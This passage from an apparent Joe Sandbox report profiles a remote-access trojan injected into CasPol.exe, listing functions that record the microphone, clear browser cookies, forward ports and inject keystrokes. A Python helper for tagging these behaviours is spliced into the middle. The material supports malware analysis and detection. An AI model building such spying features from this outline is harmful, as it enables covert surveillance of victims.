                                                                                                                                                                          • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                                                                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
• __freea.LIBCMT ref: 00454083
• __freea.LIBCMT ref: 0045408F
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
• String ID:
• API String ID: 201697637-0
• Opcode ID: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
• Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
• Opcode Fuzzy Hash: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
• Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
APIs
• CopyFileW.KERNEL32(?,?,00000000), ref: 10001D1B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 10001D37
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
• CloseHandle.KERNEL32(00000000), ref: 10001D7D
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: File$Delete$CloseCopyCreateHandleReadSize
• String ID:
• API String ID: 1454806937-0
• Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
• Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
• Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
• Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• _memcmp.LIBVCRUNTIME ref: 004454A4
• _free.LIBCMT ref: 00445515
• _free.LIBCMT ref: 0044552E
• _free.LIBCMT ref: 00445560
• _free.LIBCMT ref: 00445569
• _free.LIBCMT ref: 00445575
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _free$ErrorLast$_abort_memcmp
• String ID: C
• API String ID: 1679612858-1037565863
• Opcode ID: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
• Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
• Opcode Fuzzy Hash: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
• Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID:
• String ID: tcp$udp
• API String ID: 0-3725065008
• Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
• Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
• Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
• Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
APIs
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Eventinet_ntoa
• String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
• API String ID: 3578746661-168337528
• Opcode ID: d0b76150e621080491dc5dd9b369e9b9f9096b4c029590180129f3bde6b2885f
• Instruction ID: cd9a01f22de2d9f6a9994d78948339ea64d6c0f71f497d0a384e35af32d82467
• Opcode Fuzzy Hash: d0b76150e621080491dc5dd9b369e9b9f9096b4c029590180129f3bde6b2885f
• Instruction Fuzzy Hash: 0E51C531A042015BC724FB36D95AAAE36A5AB80344F40453FF606576F2EF7C8985C7DE
APIs
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
• WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• CloseHandle.KERNEL32(00000000), ref: 00407A88
• MoveFileW.KERNEL32 ref: 00407AA5
• CloseHandle.KERNEL32(00000000), ref: 00407AD0
• DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474F08,00404C49,00000000,00000000,00000000,?,00474F08,?), ref: 00404BA5
  • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
• String ID: .part
• API String ID: 1303771098-3499674018
• Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
• Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
• Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
• Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
APIs
• _strftime.LIBCMT ref: 00401BD4
  • Part of subcall function 00401CE9: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401D55
• waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401C86
• waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CC4
• waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CD3
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
• String ID: %Y-%m-%d %H.%M$.wav$tMG
• API String ID: 3809562944-3627046146
• Opcode ID: 477eb592cf8913c9b1db3799ce86c6a4457f3d06fe7f678cb2ce5cee42c76145
• Instruction ID: 77224d9c3c18060e3821781750c24aeed92f5db76bec914a8a88ddbccf287b9a
• Opcode Fuzzy Hash: 477eb592cf8913c9b1db3799ce86c6a4457f3d06fe7f678cb2ce5cee42c76145
• Instruction Fuzzy Hash: 5F3181315043019FC325EB62DD46A9A77A8FB84319F40443EF149A31F2EFB89949CB9A
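The entries above list, per recovered function, the Windows APIs it calls and the string constants it references, but leave the reader to work out what each API/string mix amounts to (the CopyFileW/ReadFile/DeleteFileW sequence, the WriteFile/MoveFileW pair with ".part", the waveIn* calls with a strftime pattern and ".wav"). The following Python triage helper is an added example, not Joe Sandbox code and not from this report: it parses three of the entries above (excerpted verbatim, indentation and link residue removed) and tags each function with the behaviour its API and string combination suggests. The behaviour rules are my own heuristics, not Joe Sandbox signatures, and the tags are leads to confirm in the disassembly rather than findings of the report.

```python
"""Added triage helper: parse Joe Sandbox per-function API/string entries."""
import re
from dataclasses import dataclass, field

# Three entries excerpted from the report listing above, reduced to the lines
# the parser reads (API calls, snapshot file, string IDs, opcode ID, and the
# "Instruction Fuzzy Hash" line that terminates every entry).
REPORT_EXCERPT = """\
• CopyFileW.KERNEL32(?,?,00000000), ref: 10001D1B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 10001D37
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
• CloseHandle.KERNEL32(00000000), ref: 10001D7D
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
• String ID:
• Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
• Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
• WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• CloseHandle.KERNEL32(00000000), ref: 00407A88
• MoveFileW.KERNEL32 ref: 00407AA5
• CloseHandle.KERNEL32(00000000), ref: 00407AD0
• DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
• String ID: .part
• Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
• Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
• _strftime.LIBCMT ref: 00401BD4
  • Part of subcall function 00401CE9: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401D55
• waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401C86
• waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CC4
• waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CD3
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
• String ID: %Y-%m-%d %H.%M$.wav$tMG
• Opcode ID: 477eb592cf8913c9b1db3799ce86c6a4457f3d06fe7f678cb2ce5cee42c76145
• Instruction Fuzzy Hash: 5F3181315043019FC325EB62DD46A9A77A8FB84319F40443EF149A31F2EFB89949CB9A
"""

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by the
# "Part of subcall function XXXX:" marker the report uses for callees.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<callee>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+).*?ref:\s*(?P<ref>[0-9A-F]+)$"
)

@dataclass
class FunctionEntry:
    opcode_id: str = ""
    snapshot: str = ""
    apis: list = field(default_factory=list)     # (api, module, ref, direct_call)
    strings: list = field(default_factory=list)

    def host_process(self):
        # "hcaresult_20_2_400000_CasPol.jbxd" -> "CasPol" (the injected host)
        return self.snapshot.rsplit(".", 1)[0].rsplit("_", 1)[-1]

def parse_entries(text):
    entries, cur = [], FunctionEntry()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_LINE.match(line)
        if m:
            cur.apis.append((m["api"], m["module"], m["ref"], m["callee"] is None))
        elif line.startswith("• String ID:"):
            value = line.split(":", 1)[1].strip()
            cur.strings = value.split("$") if value else []   # "$" joins strings
        elif line.startswith("• Snapshot File:"):
            cur.snapshot = line.split(":", 1)[1].strip()
        elif line.startswith("• Opcode ID:"):
            cur.opcode_id = line.split(":", 1)[1].strip()
        elif line.startswith("• Instruction Fuzzy Hash:"):   # last line of an entry
            entries.append(cur)
            cur = FunctionEntry()
    return entries

# Heuristic rules (mine, not Joe Sandbox signatures): every listed API and
# string must be present. They match names only, not call order, so a hit
# is a lead to confirm in the disassembly, not a verdict.
RULES = [
    ("microphone capture to timestamped .wav", {"waveInPrepareHeader", "waveInAddBuffer"}, {".wav"}),
    ("copy file, read the copy, delete it", {"CopyFileW", "ReadFile", "DeleteFileW"}, set()),
    ("write .part temp file, then rename into place", {"WriteFile", "MoveFileW"}, {".part"}),
    ("port-forwarding command handler", set(), {"StartForward", "StartReverse"}),
    ("existence check of a registry-configured path",
     {"RegOpenKeyExA", "ExpandEnvironmentStringsA", "PathFileExistsA"}, set()),
]

def tag_entry(entry):
    names = {api for api, _, _, _ in entry.apis}
    strings = set(entry.strings)
    return [tag for tag, apis, strs in RULES if apis <= names and strs <= strings]

if __name__ == "__main__":
    for entry in parse_entries(REPORT_EXCERPT):
        print(entry.host_process(), entry.opcode_id[:12], tag_entry(entry))
```

Two of the rules (port forwarding, registry path check) are written from the other entries in this section and do not fire on the three excerpted here; paste those entries into REPORT_EXCERPT to exercise them. Because the rules look at API names and strings only, a function that calls the same APIs in a different order, or through a callee the report lists as "Part of subcall function", is tagged identically; the `direct_call` flag on each API tuple is kept so a stricter rule can distinguish the two.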
APIs
  • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
  • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
  • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
• ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
• PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Similarity
• API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
• String ID: [IE cookies cleared!]$[IE cookies not found]$@ev$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
• API String ID: 1133728706-857889915
• Opcode ID: cd9327ffdb431f4455594d9103b4f46f207419a2cf19a94e91c1903f73b76458
• Instruction ID: 7718d61ab729039ae94473664947c91a52367f601ff6055b29c84dcba8ed2574
• Opcode Fuzzy Hash: cd9327ffdb431f4455594d9103b4f46f207419a2cf19a94e91c1903f73b76458
• Instruction Fuzzy Hash: E7215230A40219A6CB14F7F1CC969EE7729AF50744F80017FE502B71D1EB7D6945C6DA
APIs
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401A7D
• waveInOpen.WINMM(00472AC0,000000FF,00472AC8,Function_00001B8F,00000000,00000000), ref: 00401B13
• waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401B67
• waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401B76
• waveInStart.WINMM ref: 00401B82
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Similarity
• API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
• String ID: h}v$tMG
• API String ID: 1356121797-903662354
• Opcode ID: 9b1047c9ca44e2a749ab23d5d752e689566d8b18fd1d1c15b9f7858ca427b8e5
• Instruction ID: cbef553d477d36f78321a165484ecc4410fcecc505b8f9aca62d01b994c6c3e6
• Opcode Fuzzy Hash: 9b1047c9ca44e2a749ab23d5d752e689566d8b18fd1d1c15b9f7858ca427b8e5
• Instruction Fuzzy Hash: 8E2148716042019FC7299F6AEE09A697BAAFB84711B04403EE10DD76F1DBF848C5CB2C
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Similarity
• API ID:
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Rmc-N6HMP4$h}v$xtv
• API String ID: 0-1346341271
• Opcode ID: b018cd633a599e0a64cff488a6689e85db8eb881d1095507843e93d878d2a38f
• Instruction ID: 8e81a4762a03630119b5543cf4782e43f3d691fcab72f30749e56a9243805afb
• Opcode Fuzzy Hash: b018cd633a599e0a64cff488a6689e85db8eb881d1095507843e93d878d2a38f
• Instruction Fuzzy Hash: 08F0F6B0A14141ABCB1067355D286AA3756A784397F00487BF547FB2F2EBBD5C82861E
APIs
• SendInput.USER32 ref: 00419A25
• SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
• SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
  • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Similarity
• API ID: InputSend$Virtual
• String ID:
• API String ID: 1167301434-0
• Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
• Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
• Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
• Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Similarity
• API ID: __freea$__alloca_probe_16_free
• String ID: a/p$am/pm$h{D
• API String ID: 2936374016-2303565833
• Opcode ID: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
• Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
• Opcode Fuzzy Hash: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
• Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
APIs
  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
• _free.LIBCMT ref: 00444E87
• _free.LIBCMT ref: 00444E9E
• _free.LIBCMT ref: 00444EBD
• _free.LIBCMT ref: 00444ED8
• _free.LIBCMT ref: 00444EEF
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Similarity
• API ID: _free$AllocateHeap
• String ID: KED
• API String ID: 3033488037-2133951994
• Opcode ID: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
• Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
• Opcode Fuzzy Hash: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
• Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
APIs
• GetConsoleCP.KERNEL32 ref: 0044B47E
• __fassign.LIBCMT ref: 0044B4F9
• __fassign.LIBCMT ref: 0044B514
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
• WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
• WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
• Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
• Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
• Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                                                                          • __fassign.LIBCMT ref: 1000954F
                                                                                                                                                                          • __fassign.LIBCMT ref: 1000956A
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                          • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                          • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                                                          • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                          • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                                                                                                          • ExitThread.KERNEL32 ref: 004018F6
                                                                                                                                                                          • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                                                                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                                                          • String ID: `kG$hMG$kG
                                                                                                                                                                          • API String ID: 1649129571-3851552405
                                                                                                                                                                          • Opcode ID: 1ce366054fa8339f5f00943ccf4ea62b73f095e265aa42ece7c8249153e98c3c
                                                                                                                                                                          • Instruction ID: dc699b77c08b599092ddf19de7d80486fcd8c0a7edd7622242773fc29a9484b7
                                                                                                                                                                          • Opcode Fuzzy Hash: 1ce366054fa8339f5f00943ccf4ea62b73f095e265aa42ece7c8249153e98c3c
                                                                                                                                                                          • Instruction Fuzzy Hash: 3441C2312042009BC324FB36DD96ABE73A6AB85354F00453FF54AA61F1DF38AD4AC61E
                                                                                                                                                                          APIs
